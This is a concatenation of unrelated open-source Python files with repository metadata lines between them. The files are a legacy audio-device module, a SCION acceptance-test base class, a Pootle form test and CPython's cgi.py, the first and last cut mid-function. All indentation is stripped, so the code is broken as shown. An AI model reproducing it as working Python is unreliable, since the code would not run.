info.o_encoding = SUNAUDIODEV.ENCODING_LINEAR
self.port.setinfo(info)
if self.converter:
data = self.converter(data)
self.port.write(data)
def wait(self):
if not self.port:
return
self.port.drain()
self.stop()
def stop(self):
if self.port:
self.port.flush()
self.port.close()
self.port = None
def getfilled(self):
if self.port:
return self.port.obufcount()
else:
return 0
## # Nobody remembers what this method does, and it's broken. :-(
## def getfillable(self):
## return BUFFERSIZE - self.getfilled()
def AudioDev():
# Dynamically try to import and use a platform specific module.
try:
import al
except ImportError:
try:
import sunaudiodev
return Play_Audio_sun()
except ImportError:
try:
import Audio_mac
except ImportError:
raise error, 'no audio device'
else:
return Audio_mac.Play_Audio_mac()
else:
return Play_Audio_sgi()
def test(fn = None):
import sys
if sys.argv[1:]:
fn = sys.argv[1]
else:
fn = 'f:just samples:just.aif'
import aifc
af = aifc.open(fn, 'r')
print fn, af.getparams()
p = AudioDev()
p.setoutrate(af.getframerate())
p.setsampwidth(af.getsampwidth())
p.setnchannels(af.getnchannels())
BUFSIZ = af.getframerate()/af.getsampwidth()/af.getnchannels()
while 1:
data = af.readframes(BUFSIZ)
if not data: break
print len(data)
p.writeframes(data)
p.wait()
if __name__ == '__main__':
test()
| mit |
Oncilla/scion | acceptance/common/base.py | 1 | 7373 | # Copyright 2019 Anapaya Systems
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
import os
import re
import typing
from plumbum import cli
from plumbum import local
from plumbum import cmd
from plumbum import path
from acceptance.common.docker import Compose
from acceptance.common.log import LogExec
from acceptance.common.scion import SCION, SCIONSupervisor
NAME = 'NOT_SET' # must be set by users of the Base class.
DIR = 'NOT_SET'
logger = logging.getLogger(__name__)
def set_name(file: str):
global NAME
global DIR
DIR = local.path(file).dirname.name
NAME = DIR[:-len('_acceptance')]
class TestState:
"""
TestState is used to share state between the command
and the sub-command.
"""
artifacts = None
def __init__(self, scion: SCION, dc: Compose):
"""
Create new environment state for an execution of the acceptance
testing framework. Plumbum subcommands can access this state
via the parent to retrieve information about the test environment.
"""
self.scion = scion
self.dc = dc
self.topology_tar = ""
self.containers_tar = ""
if 'TEST_UNDECLARED_OUTPUTS_DIR' in os.environ:
self.artifacts = local.path(os.environ['TEST_UNDECLARED_OUTPUTS_DIR'])
else:
self.artifacts = local.path("/tmp/artifacts-scion")
self.dc.compose_file = self.artifacts / 'gen/scion-dc.yml'
self.no_docker = False
self.tools_dc = local['./tools/dc']
class TestBase(cli.Application):
"""
TestBase is used to implement the test entry point. Tests should
sub-class it and only define the doc string.
"""
test_state = None # type: TestState
@cli.switch('disable-docker', envname='DISABLE_DOCKER',
help='Run in supervisor environment.')
def disable_docker(self):
self.test_state.no_docker = True
self.test_state.scion = SCIONSupervisor()
@cli.switch('artifacts', str, envname='ACCEPTANCE_ARTIFACTS',
help='Artifacts directory (for legacy tests)')
def artifacts_dir(self, a_dir: str):
self.test_state.artifacts = local.path('%s/%s/' % (a_dir, NAME))
@cli.switch('artifacts_dir', str, help='Artifacts directory (for bazel tests)')
def artifacts_dir_new(self, a_dir: str):
self.test_state.artifacts = local.path(a_dir)
self.test_state.dc.compose_file = self.test_state.artifacts / 'gen/scion-dc.yml'
@cli.switch('topology_tar', str, help="The tarball with the topology files")
def topology_tar(self, tar: str):
self.test_state.topology_tar = tar
@cli.switch('containers_tar', str, help="The tarball with the containers")
def containers_tar(self, tar: str):
self.test_state.containers_tar = tar
@cli.switch('bazel_rule', str, help="The bazel rule that triggered the test")
def test_type(self, rule: str):
self.test_state.bazel_rule = rule
def _unpack_topo(self):
cmd.tar('-xf', self.test_state.topology_tar, '-C', self.test_state.artifacts)
cmd.sed('-i', 's#$SCIONROOT#%s#g' % self.test_state.artifacts,
self.test_state.artifacts / 'gen/scion-dc.yml')
self.test_state.dc.compose_file = self.test_state.artifacts / 'gen/scion-dc.yml'
def setup_prepare(self):
"""Unpacks the topology and loads local docker images.
"""
# Delete old artifacts, if any.
cmd.rm("-rf", self.test_state.artifacts)
cmd.mkdir(self.test_state.artifacts)
print('artifacts dir: %s' % self.test_state.artifacts)
self._unpack_topo()
print(cmd.docker('image', 'load', '-i', self.test_state.containers_tar))
def setup(self):
self.setup_prepare()
self.setup_start()
def setup_start(self):
"""Starts the docker containers in the topology.
"""
print(self.test_state.dc('up', '-d'))
print(self.test_state.dc('ps'))
def teardown(self):
out_dir = self.test_state.artifacts / 'logs'
self.test_state.dc.collect_logs(out_dir=out_dir)
ps = self.test_state.dc('ps')
print(self.test_state.dc('down', '-v'))
if re.search(r"Exit\s+[1-9]\d*", ps):
raise Exception("Failed services.\n" + ps)
def send_signal(self, container, signal):
"""Sends signal to a container.
Args:
container: the name of the container.
signal: the signal to send
"""
print(self.test_state.dc("kill", "-s", signal, container))
class CmdBase(cli.Application):
""" CmdBase is used to implement the test sub-commands. """
tools_dc = local['./tools/dc']
def cmd_dc(self, *args):
for line in self.dc(*args).splitlines():
print(line)
def cmd_setup(self):
cmd.mkdir('-p', self.artifacts)
def cmd_teardown(self):
if not self.no_docker:
self.dc.collect_logs(self.artifacts / 'logs' / 'docker')
self.tools_dc('down')
self.scion.stop()
def _collect_logs(self, name: str):
if path.local.LocalPath('gen/%s-dc.yml' % name).exists():
self.tools_dc('collect_logs', name, self.artifacts / 'logs' / 'docker')
def _teardown(self, name: str):
if path.local.LocalPath('gen/%s-dc.yml' % name).exists():
self.tools_dc(name, 'down')
@staticmethod
def test_dir(prefix: str = '', directory: str = 'acceptance') -> path.local.LocalPath:
return local.path(prefix, directory) / DIR
@staticmethod
def docker_status():
logger.info('Docker containers')
print(cmd.docker('ps', '-a', '-s'))
@property
def dc(self):
return self.parent.test_state.dc
@property
def artifacts(self):
return self.parent.test_state.artifacts
@property
def scion(self):
return self.parent.test_state.scion
@property
def no_docker(self):
return self.parent.test_state.no_docker
@TestBase.subcommand('name')
class TestName(CmdBase):
def main(self):
print(NAME)
@TestBase.subcommand('teardown')
class TestTeardown(CmdBase):
"""
Teardown topology by stopping all running services..
In a dockerized topology, the logs are collected.
"""
@LogExec(logger, 'teardown')
def main(self):
self.cmd_teardown()
def register_commands(c: typing.Type[TestBase]):
"""
Registers the default subcommands to the test class c.
"""
class TestSetup(c):
def main(self):
self.setup()
class TestRun(c):
def main(self):
self._run()
class TestTeardown(c):
def main(self):
self.teardown()
c.subcommand("setup", TestSetup)
c.subcommand("run", TestRun)
c.subcommand("teardown", TestTeardown)
| apache-2.0 |
unho/pootle | tests/pootle_app/forms.py | 5 | 1571 | # -*- coding: utf-8 -*-
#
# Copyright (C) Pootle contributors.
#
# This file is a part of the Pootle project. It is distributed under the GPL3
# or later license. See the LICENSE file for a copy of the license and the
# AUTHORS file for copyright and authorship information.
import pytest
from pootle_app.forms import PermissionsUsersSearchForm
from pootle_app.models.permissions import PermissionSet, get_pootle_permission
@pytest.mark.django_db
def test_form_permissions_users(project0, member, member2):
# must supply a directory
with pytest.raises(KeyError):
PermissionsUsersSearchForm()
form = PermissionsUsersSearchForm(
directory=project0.directory, data={})
assert not form.is_valid()
assert "q" in form.errors
form = PermissionsUsersSearchForm(
directory=project0.directory,
data=dict(q="mem"))
assert form.is_valid()
assert form.cleaned_data == dict(q="mem")
results = form.search()["results"]
assert results[0]['text'] == member.username
assert results[0]['id'] == member.pk
assert results[1]['text'] == member2.username
assert results[1]['id'] == member2.pk
# providing a user with permissions in this directory
# means they are excluded from search results
view = get_pootle_permission('view')
perm_set = PermissionSet.objects.create(
user=member,
directory=project0.directory)
perm_set.positive_permissions.add(view)
assert form.search() == {
'results': [
{'text': member2.username, 'id': member2.pk}]}
| gpl-3.0 |
glwu/python-for-android | python3-alpha/python3-src/Lib/cgi.py | 46 | 34484 | #! /usr/local/bin/python
# NOTE: the above "/usr/local/bin/python" is NOT a mistake. It is
# intentionally NOT "/usr/bin/env python". On many systems
# (e.g. Solaris), /usr/local/bin is not in $PATH as passed to CGI
# scripts, and /usr/local/bin is the default directory where Python is
# installed, so /usr/bin/env would be unable to find python. Granted,
# binary installations by Linux vendors often install Python in
# /usr/bin. So let those vendors patch cgi.py to match their choice
# of installation.
"""Support module for CGI (Common Gateway Interface) scripts.
This module defines a number of utilities for use by CGI scripts
written in Python.
"""
# History
# -------
#
# Michael McLay started this module. Steve Majewski changed the
# interface to SvFormContentDict and FormContentDict. The multipart
# parsing was inspired by code submitted by Andreas Paepcke. Guido van
# Rossum rewrote, reformatted and documented the module and is currently
# responsible for its maintenance.
#
__version__ = "2.6"
# Imports
# =======
from io import StringIO, BytesIO, TextIOWrapper
import sys
import os
import urllib.parse
from email.parser import FeedParser
from warnings import warn
import html
import locale
import tempfile
__all__ = ["MiniFieldStorage", "FieldStorage",
"parse", "parse_qs", "parse_qsl", "parse_multipart",
"parse_header", "print_exception", "print_environ",
"print_form", "print_directory", "print_arguments",
"print_environ_usage", "escape"]
# Logging support
# ===============
logfile = "" # Filename to log to, if not empty
logfp = None # File object to log to, if not None
def initlog(*allargs):
"""Write a log message, if there is a log file.
Even though this function is called initlog(), you should always
use log(); log is a variable that is set either to initlog
(initially), to dolog (once the log file has been opened), or to
nolog (when logging is disabled).
The first argument is a format string; the remaining arguments (if
any) are arguments to the % operator, so e.g.
log("%s: %s", "a", "b")
will write "a: b" to the log file, followed by a newline.
If the global logfp is not None, it should be a file object to
which log data is written.
If the global logfp is None, the global logfile may be a string
giving a filename to open, in append mode. This file should be
world writable!!! If the file can't be opened, logging is
silently disabled (since there is no safe place where we could
send an error message).
"""
global logfp, log
if logfile and not logfp:
try:
logfp = open(logfile, "a")
except IOError:
pass
if not logfp:
log = nolog
else:
log = dolog
log(*allargs)
def dolog(fmt, *args):
"""Write a log message to the log file. See initlog() for docs."""
logfp.write(fmt%args + "\n")
def nolog(*allargs):
"""Dummy function, assigned to log when logging is disabled."""
pass
log = initlog # The current logging function
# Parsing functions
# =================
# Maximum input we will accept when REQUEST_METHOD is POST
# 0 ==> unlimited input
maxlen = 0
def parse(fp=None, environ=os.environ, keep_blank_values=0, strict_parsing=0):
"""Parse a query in the environment or from a file (default stdin)
Arguments, all optional:
fp : file pointer; default: sys.stdin.buffer
environ : environment dictionary; default: os.environ
keep_blank_values: flag indicating whether blank values in
percent-encoded forms should be treated as blank strings.
A true value indicates that blanks should be retained as
blank strings. The default false value indicates that
blank values are to be ignored and treated as if they were
not included.
strict_parsing: flag indicating what to do with parsing errors.
If false (the default), errors are silently ignored.
If true, errors raise a ValueError exception.
"""
if fp is None:
fp = sys.stdin
# field keys and values (except for files) are returned as strings
# an encoding is required to decode the bytes read from self.fp
if hasattr(fp,'encoding'):
encoding = fp.encoding
else:
encoding = 'latin-1'
# fp.read() must return bytes
if isinstance(fp, TextIOWrapper):
fp = fp.buffer
if not 'REQUEST_METHOD' in environ:
environ['REQUEST_METHOD'] = 'GET' # For testing stand-alone
if environ['REQUEST_METHOD'] == 'POST':
ctype, pdict = parse_header(environ['CONTENT_TYPE'])
if ctype == 'multipart/form-data':
return parse_multipart(fp, pdict)
elif ctype == 'application/x-www-form-urlencoded':
clength = int(environ['CONTENT_LENGTH'])
if maxlen and clength > maxlen:
raise ValueError('Maximum content length exceeded')
qs = fp.read(clength).decode(encoding)
else:
qs = '' # Unknown content-type
if 'QUERY_STRING' in environ:
if qs: qs = qs + '&'
qs = qs + environ['QUERY_STRING']
elif sys.argv[1:]:
if qs: qs = qs + '&'
qs = qs + sys.argv[1]
environ['QUERY_STRING'] = qs # XXX Shouldn't, really
elif 'QUERY_STRING' in environ:
qs = environ['QUERY_STRING']
else:
if sys.argv[1:]:
qs = sys.argv[1]
else:
qs = ""
environ['QUERY_STRING'] = qs # XXX Shouldn't, really
return urllib.parse.parse_qs(qs, keep_blank_values, strict_parsing,
encoding=encoding)
# parse query string function called from urlparse,
# this is done in order to maintain backward compatiblity.
def parse_qs(qs, keep_blank_values=0, strict_parsing=0):
"""Parse a query given as a string argument."""
warn("cgi.parse_qs is deprecated, use urllib.parse.parse_qs instead",
DeprecationWarning, 2)
return urllib.parse.parse_qs(qs, keep_blank_values, strict_parsing)
def parse_qsl(qs, keep_blank_values=0, strict_parsing=0):
"""Parse a query given as a string argument."""
warn("cgi.parse_qsl is deprecated, use urllib.parse.parse_qsl instead",
DeprecationWarning, 2)
return urllib.parse.parse_qsl(qs, keep_blank_values, strict_parsing)
def parse_multipart(fp, pdict):
"""Parse multipart input.
Arguments:
fp : input file
pdict: dictionary containing other parameters of content-type header
Returns a dictionary just like parse_qs(): keys are the field names, each
value is a list of values for that field. This is easy to use but not
much good if you are expecting megabytes to be uploaded -- in that case,
use the FieldStorage class instead which is much more flexible. Note
that content-type is the raw, unparsed contents of the content-type
header.
XXX This does not parse nested multipart parts -- use FieldStorage for
that.
XXX This should really be subsumed by FieldStorage altogether -- no
point in having two implementations of the same parsing algorithm.
Also, FieldStorage protects itself better against certain DoS attacks
by limiting the size of the data read in one chunk. The API here
does not support that kind of protection. This also affects parse()
since it can call parse_multipart().
"""
import http.client
boundary = ""
if 'boundary' in pdict:
boundary = pdict['boundary']
if not valid_boundary(boundary):
raise ValueError('Invalid boundary in multipart form: %r'
% (boundary,))
nextpart = "--" + boundary
lastpart = "--" + boundary + "--"
partdict = {}
terminator = ""
while terminator != lastpart:
bytes = -1
data = None
if terminator:
# At start of next part. Read headers first.
headers = http.client.parse_headers(fp)
clength = headers.get('content-length')
if clength:
try:
bytes = int(clength)
except ValueError:
pass
if bytes > 0:
if maxlen and bytes > maxlen:
raise ValueError('Maximum content length exceeded')
data = fp.read(bytes)
else:
data = ""
# Read lines until end of part.
lines = []
while 1:
line = fp.readline()
if not line:
terminator = lastpart # End outer loop
break
if line.startswith("--"):
terminator = line.rstrip()
if terminator in (nextpart, lastpart):
break
lines.append(line)
# Done with part.
if data is None:
continue
if bytes < 0:
if lines:
# Strip final line terminator
line = lines[-1]
if line[-2:] == "\r\n":
line = line[:-2]
elif line[-1:] == "\n":
line = line[:-1]
lines[-1] = line
data = "".join(lines)
line = headers['content-disposition']
if not line:
continue
key, params = parse_header(line)
if key != 'form-data':
continue
if 'name' in params:
name = params['name']
else:
continue
if name in partdict:
partdict[name].append(data)
else:
partdict[name] = [data]
return partdict
def _parseparam(s):
while s[:1] == ';':
s = s[1:]
end = s.find(';')
while end > 0 and s.count('"', 0, end) % 2:
end = s.find(';', end + 1)
if end < 0:
end = len(s)
f = s[:end]
yield f.strip()
s = s[end:]
def parse_header(line):
"""Parse a Content-type like header.
Return the main content-type and a dictionary of options.
"""
parts = _parseparam(';' + line)
key = parts.__next__()
pdict = {}
for p in parts:
i = p.find('=')
if i >= 0:
name = p[:i].strip().lower()
value = p[i+1:].strip()
if len(value) >= 2 and value[0] == value[-1] == '"':
value = value[1:-1]
value = value.replace('\\\\', '\\').replace('\\"', '"')
pdict[name] = value
return key, pdict
# Classes for field storage
# =========================
class MiniFieldStorage:
"""Like FieldStorage, for use when no file uploads are possible."""
# Dummy attributes
filename = None
list = None
type = None
file = None
type_options = {}
disposition = None
disposition_options = {}
headers = {}
def __init__(self, name, value):
"""Constructor from field name and value."""
self.name = name
self.value = value
# self.file = StringIO(value)
def __repr__(self):
"""Return printable representation."""
return "MiniFieldStorage(%r, %r)" % (self.name, self.value)
class FieldStorage:
"""Store a sequence of fields, reading multipart/form-data.
This class provides naming, typing, files stored on disk, and
more. At the top level, it is accessible like a dictionary, whose
keys are the field names. (Note: None can occur as a field name.)
The items are either a Python list (if there's multiple values) or
another FieldStorage or MiniFieldStorage object. If it's a single
object, it has the following attributes:
name: the field name, if specified; otherwise None
filename: the filename, if specified; otherwise None; this is the
client side filename, *not* the file name on which it is
stored (that's a temporary file you don't deal with)
value: the value as a *string*; for file uploads, this
transparently reads the file every time you request the value
and returns *bytes*
file: the file(-like) object from which you can read the data *as
bytes* ; None if the data is stored a simple string
type: the content-type, or None if not specified
type_options: dictionary of options specified on the content-type
line
disposition: content-disposition, or None if not specified
disposition_options: dictionary of corresponding options
headers: a dictionary(-like) object (sometimes email.message.Message or a
subclass thereof) containing *all* headers
The class is subclassable, mostly for the purpose of overriding
the make_file() method, which is called internally to come up with
a file open for reading and writing. This makes it possible to
override the default choice of storing all files in a temporary
directory and unlinking them as soon as they have been opened.
"""
def __init__(self, fp=None, headers=None, outerboundary=b'',
environ=os.environ, keep_blank_values=0, strict_parsing=0,
limit=None, encoding='utf-8', errors='replace'):
"""Constructor. Read multipart/* until last part.
Arguments, all optional:
fp : file pointer; default: sys.stdin.buffer
(not used when the request method is GET)
Can be :
1. a TextIOWrapper object
2. an object whose read() and readline() methods return bytes
headers : header dictionary-like object; default:
taken from environ as per CGI spec
outerboundary : terminating multipart boundary
(for internal use only)
environ : environment dictionary; default: os.environ
keep_blank_values: flag indicating whether blank values in
percent-encoded forms should be treated as blank strings.
A true value indicates that blanks should be retained as
blank strings. The default false value indicates that
blank values are to be ignored and treated as if they were
not included.
strict_parsing: flag indicating what to do with parsing errors.
If false (the default), errors are silently ignored.
If true, errors raise a ValueError exception.
limit : used internally to read parts of multipart/form-data forms,
to exit from the reading loop when reached. It is the difference
between the form content-length and the number of bytes already
read
encoding, errors : the encoding and error handler used to decode the
binary stream to strings. Must be the same as the charset defined
for the page sending the form (content-type : meta http-equiv or
header)
"""
method = 'GET'
self.keep_blank_values = keep_blank_values
self.strict_parsing = strict_parsing
if 'REQUEST_METHOD' in environ:
method = environ['REQUEST_METHOD'].upper()
self.qs_on_post = None
if method == 'GET' or method == 'HEAD':
if 'QUERY_STRING' in environ:
qs = environ['QUERY_STRING']
elif sys.argv[1:]:
qs = sys.argv[1]
else:
qs = ""
qs = qs.encode(locale.getpreferredencoding(), 'surrogateescape')
fp = BytesIO(qs)
if headers is None:
headers = {'content-type':
"application/x-www-form-urlencoded"}
if headers is None:
headers = {}
if method == 'POST':
# Set default content-type for POST to what's traditional
headers['content-type'] = "application/x-www-form-urlencoded"
if 'CONTENT_TYPE' in environ:
headers['content-type'] = environ['CONTENT_TYPE']
if 'QUERY_STRING' in environ:
self.qs_on_post = environ['QUERY_STRING']
if 'CONTENT_LENGTH' in environ:
headers['content-length'] = environ['CONTENT_LENGTH']
if fp is None:
self.fp = sys.stdin.buffer
# self.fp.read() must return bytes
elif isinstance(fp, TextIOWrapper):
self.fp = fp.buffer
else:
self.fp = fp
self.encoding = encoding
self.errors = errors
self.headers = headers
if not isinstance(outerboundary, bytes):
raise TypeError('outerboundary must be bytes, not %s'
% type(outerboundary).__name__)
self.outerboundary = outerboundary
self.bytes_read = 0
self.limit = limit
# Process content-disposition header
cdisp, pdict = "", {}
if 'content-disposition' in self.headers:
cdisp, pdict = parse_header(self.headers['content-disposition'])
self.disposition = cdisp
self.disposition_options = pdict
self.name = None
if 'name' in pdict:
self.name = pdict['name']
self.filename = None
if 'filename' in pdict:
self.filename = pdict['filename']
self._binary_file = self.filename is not None
# Process content-type header
#
# Honor any existing content-type header. But if there is no
# content-type header, use some sensible defaults. Assume
# outerboundary is "" at the outer level, but something non-false
# inside a multi-part. The default for an inner part is text/plain,
# but for an outer part it should be urlencoded. This should catch
# bogus clients which erroneously forget to include a content-type
# header.
#
# See below for what we do if there does exist a content-type header,
# but it happens to be something we don't understand.
if 'content-type' in self.headers:
ctype, pdict = parse_header(self.headers['content-type'])
elif self.outerboundary or method != 'POST':
ctype, pdict = "text/plain", {}
else:
ctype, pdict = 'application/x-www-form-urlencoded', {}
self.type = ctype
self.type_options = pdict
if 'boundary' in pdict:
self.innerboundary = pdict['boundary'].encode(self.encoding)
else:
self.innerboundary = b""
clen = -1
if 'content-length' in self.headers:
try:
clen = int(self.headers['content-length'])
except ValueError:
pass
if maxlen and clen > maxlen:
raise ValueError('Maximum content length exceeded')
self.length = clen
if self.limit is None and clen:
self.limit = clen
self.list = self.file = None
self.done = 0
if ctype == 'application/x-www-form-urlencoded':
self.read_urlencoded()
elif ctype[:10] == 'multipart/':
self.read_multi(environ, keep_blank_values, strict_parsing)
else:
self.read_single()
def __repr__(self):
"""Return a printable representation."""
return "FieldStorage(%r, %r, %r)" % (
self.name, self.filename, self.value)
def __iter__(self):
return iter(self.keys())
def __getattr__(self, name):
if name != 'value':
raise AttributeError(name)
if self.file:
self.file.seek(0)
value = self.file.read()
self.file.seek(0)
elif self.list is not None:
value = self.list
else:
value = None
return value
def __getitem__(self, key):
"""Dictionary style indexing."""
if self.list is None:
raise TypeError("not indexable")
found = []
for item in self.list:
if item.name == key: found.append(item)
if not found:
raise KeyError(key)
if len(found) == 1:
return found[0]
else:
return found
def getvalue(self, key, default=None):
"""Dictionary style get() method, including 'value' lookup."""
if key in self:
value = self[key]
if isinstance(value, list):
return [x.value for x in value]
else:
return value.value
else:
return default
def getfirst(self, key, default=None):
""" Return the first value received."""
if key in self:
value = self[key]
if isinstance(value, list):
return value[0].value
else:
return value.value
else:
return default
def getlist(self, key):
""" Return list of received values."""
if key in self:
value = self[key]
if isinstance(value, list):
return [x.value for x in value]
else:
return [value.value]
else:
return []
def keys(self):
"""Dictionary style keys() method."""
if self.list is None:
raise TypeError("not indexable")
return list(set(item.name for item in self.list))
def __contains__(self, key):
"""Dictionary style __contains__ method."""
if self.list is None:
raise TypeError("not indexable")
return any(item.name == key for item in self.list)
def __len__(self):
"""Dictionary style len(x) support."""
return len(self.keys())
def __nonzero__(self):
return bool(self.list)
def read_urlencoded(self):
"""Internal: read data in query string format."""
qs = self.fp.read(self.length)
if not isinstance(qs, bytes):
raise ValueError("%s should return bytes, got %s" \
% (self.fp, type(qs).__name__))
qs = qs.decode(self.encoding, self.errors)
if self.qs_on_post:
qs += '&' + self.qs_on_post
self.list = []
query = urllib.parse.parse_qsl(
qs, self.keep_blank_values, self.strict_parsing,
encoding=self.encoding, errors=self.errors)
for key, value in query:
self.list.append(MiniFieldStorage(key, value))
self.skip_lines()
FieldStorageClass = None
def read_multi(self, environ, keep_blank_values, strict_parsing):
"""Internal: read a part that is itself multipart."""
ib = self.innerboundary
if not valid_boundary(ib):
raise ValueError('Invalid boundary in multipart form: %r' % (ib,))
self.list = []
if self.qs_on_post:
query = urllib.parse.parse_qsl(
self.qs_on_post, self.keep_blank_values, self.strict_parsing,
encoding=self.encoding, errors=self.errors)
for key, value in query:
self.list.append(MiniFieldStorage(key, value))
FieldStorageClass = None
klass = self.FieldStorageClass or self.__class__
first_line = self.fp.readline() # bytes
if not isinstance(first_line, bytes):
raise ValueError("%s should return bytes, got %s" \
% (self.fp, type(first_line).__name__))
self.bytes_read += len(first_line)
# first line holds boundary ; ignore it, or check that
# b"--" + ib == first_line.strip() ?
while True:
parser = FeedParser()
hdr_text = b""
while True:
data = self.fp.readline()
hdr_text += data
if not data.strip():
break
if not hdr_text:
break
# parser takes strings, not bytes
self.bytes_read += len(hdr_text)
parser.feed(hdr_text.decode(self.encoding, self.errors))
headers = parser.close()
part = klass(self.fp, headers, ib, environ, keep_blank_values,
strict_parsing,self.limit-self.bytes_read,
self.encoding, self.errors)
self.bytes_read += part.bytes_read
self.list.append(part)
if self.bytes_read >= self.length:
break
self.skip_lines()
def read_single(self):
"""Internal: read an atomic part."""
if self.length >= 0:
self.read_binary()
self.skip_lines()
else:
self.read_lines()
self.file.seek(0)
bufsize = 8*1024 # I/O buffering size for copy to file
def read_binary(self):
"""Internal: read binary data."""
self.file = self.make_file()
todo = self.length
if todo >= 0:
while todo > 0:
data = self.fp.read(min(todo, self.bufsize)) # bytes
if not isinstance(data, bytes):
raise ValueError("%s should return bytes, got %s"
% (self.fp, type(data).__name__))
self.bytes_read += len(data)
if not data:
self.done = -1
break
self.file.write(data)
todo = todo - len(data)
def read_lines(self):
"""Internal: read lines until EOF or outerboundary."""
if self._binary_file:
self.file = self.__file = BytesIO() # store data as bytes for files
else:
self.file = self.__file = StringIO() # as strings for other fields
if self.outerboundary:
self.read_lines_to_outerboundary()
else:
self.read_lines_to_eof()
def __write(self, line):
"""line is always bytes, not string"""
if self.__file is not None:
if self.__file.tell() + len(line) > 1000:
self.file = self.make_file()
data = self.__file.getvalue()
self.file.write(data)
self.__file = None
if self._binary_file:
# keep bytes
self.file.write(line)
else:
# decode to string
self.file.write(line.decode(self.encoding, self.errors))
def read_lines_to_eof(self):
"""Internal: read lines until EOF."""
while 1:
line = self.fp.readline(1<<16) # bytes
self.bytes_read += len(line)
if not line:
self.done = -1
break
self.__write(line)
def read_lines_to_outerboundary(self):
"""Internal: read lines until outerboundary.
Data is read as bytes: boundaries and line ends must be converted
to bytes for comparisons.
"""
next_boundary = b"--" + self.outerboundary
last_boundary = next_boundary + b"--"
delim = b""
last_line_lfend = True
_read = 0
while 1:
if _read >= self.limit:
break
line = self.fp.readline(1<<16) # bytes
self.bytes_read += len(line)
_read += len(line)
if not line:
self.done = -1
break
if line.startswith(b"--") and last_line_lfend:
strippedline = line.rstrip()
if strippedline == next_boundary:
break
if strippedline == last_boundary:
self.done = 1
break
odelim = delim
if line.endswith(b"\r\n"):
delim = b"\r\n"
line = line[:-2]
last_line_lfend = True
elif line.endswith(b"\n"):
delim = b"\n"
line = line[:-1]
last_line_lfend = True
else:
delim = b""
last_line_lfend = False
self.__write(odelim + line)
def skip_lines(self):
"""Internal: skip lines until outer boundary if defined."""
if not self.outerboundary or self.done:
return
next_boundary = b"--" + self.outerboundary
last_boundary = next_boundary + b"--"
last_line_lfend = True
while True:
line = self.fp.readline(1<<16)
self.bytes_read += len(line)
if not line:
self.done = -1
break
if line.endswith(b"--") and last_line_lfend:
strippedline = line.strip()
if strippedline == next_boundary:
break
if strippedline == last_boundary:
self.done = 1
break
last_line_lfend = line.endswith(b'\n')
def make_file(self):
"""Overridable: return a readable & writable file.
The file will be used as follows:
- data is written to it
- seek(0)
- data is read from it
The file is opened in binary mode for files, in text mode
for other fields
This version opens a temporary file for reading and writing,
and immediately deletes (unlinks) it. The trick (on Unix!) is
that the file can still be used, but it can't be opened by
another process, and it will automatically be deleted when it
is closed or when the current process terminates.
If you want a more permanent file, you derive a class which
overrides this method. If you want a visible temporary file
that is nevertheless automatically deleted when the script
terminates, try defining a __del__ method in a derived class
which unlinks the temporary files you have created.
"""
if self._binary_file:
return tempfile.TemporaryFile("wb+")
else:
return tempfile.TemporaryFile("w+",
encoding=self.encoding, newline = '\n')
# Test/debug code
# ===============
def test(environ=os.environ):
"""Robust test CGI script, usable as main program.
Write minimal HTTP headers and dump all information provided to
the script in HTML form.
"""
print("Content-type: text/html")
print()
sys.stderr = sys.stdout
try:
form = FieldStorage() # Replace with other classes to test those
print_directory()
print_arguments()
print_form(form)
print_environ(environ)
print_environ_usage()
def f():
exec("testing print_exception() -- <I>italics?</I>")
def g(f=f):
f()
print("<H3>What follows is a test, not an actual exception:</H3>")
g()
except:
print_exception()
print("<H1>Second try with a small maxlen...</H1>")
global maxlen
maxlen = 50
try:
form = FieldStorage() # Replace with other classes to test those
print_directory()
print_arguments()
print_form(form)
print_environ(environ)
except:
print_exception()
def print_exception(type=None, value=None, tb=None, limit=None):
if type is None:
type, value, tb = sys.exc_info()
import traceback
print()
print("<H3>Traceback (most recent call last):</H3>")
list = traceback.format_tb(tb, limit) + \
traceback.format_exception_only(type, value)
print("<PRE>%s<B>%s</B></PRE>" % (
html.escape("".join(list[:-1])),
html.escape(list[-1]),
))
del tb
def print_environ(environ=os.environ):
"""Dump the shell environment as HTML."""
keys = sorted(environ.keys())
print()
print("<H3>Shell Environment:</H3>")
print("<DL>")
for key in keys:
print("<DT>", html.escape(key), "<DD>", html.escape(environ[key]))
print("</DL>")
print()
def print_form(form):
"""Dump the contents of a form as HTML."""
keys = sorted(form.keys())
print()
print("<H3>Form Contents:</H3>")
if not keys:
print("<P>No form fields.")
print("<DL>")
for key in keys:
print("<DT>" + html.escape(key) + ":", end=' ')
value = form[key]
print("<i>" + html.escape(repr(type(value))) + "</i>")
print("<DD>" + html.escape(repr(value)))
print("</DL>")
print()
def print_directory():
"""Dump the current directory as HTML."""
print()
print("<H3>Current Working Directory:</H3>")
try:
pwd = os.getcwd()
except os.error as msg:
print("os.error:", html.escape(str(msg)))
else:
print(html.escape(pwd))
print()
def print_arguments():
print()
print("<H3>Command Line Arguments:</H3>")
print()
print(sys.argv)
print()
def print_environ_usage():
"""Dump a list of environment variables used by CGI as HTML."""
print("""
<H3>These environment variables could have been set:</H3>
<UL>
<LI>AUTH_TYPE
<LI>CONTENT_LENGTH
<LI>CONTENT_TYPE
<LI>DATE_GMT
<LI>DATE_LOCAL
<LI>DOCUMENT_NAME
<LI>DOCUMENT_ROOT
<LI>DOCUMENT_URI
<LI>GATEWAY_INTERFACE
<LI>LAST_MODIFIED
<LI>PATH
<LI>PATH_INFO
<LI>PATH_TRANSLATED
<LI>QUERY_STRING
<LI>REMOTE_ADDR
<LI>REMOTE_HOST
<LI>REMOTE_IDENT
<LI>REMOTE_USER
<LI>REQUEST_METHOD
<LI>SCRIPT_NAME
<LI>SERVER_NAME
<LI>SERVER_PORT
<LI>SERVER_PROTOCOL
<LI>SERVER_ROOT
<LI>SERVER_SOFTWARE
</UL>
In addition, HTTP headers sent by the server may be passed in the
environment as well. Here are some common variable names:
<UL>
<LI>HTTP_ACCEPT
<LI>HTTP_CONNECTION
<LI>HTTP_HOST
<LI>HTTP_PRAGMA
<LI>HTTP_REFERER
<LI>HTTP_USER_AGENT
</UL>
""")
# Utilities
# =========
def escape(s, quote=None):
"""Deprecated API."""
warn("cgi.escape is deprecated, use html.escape instead",
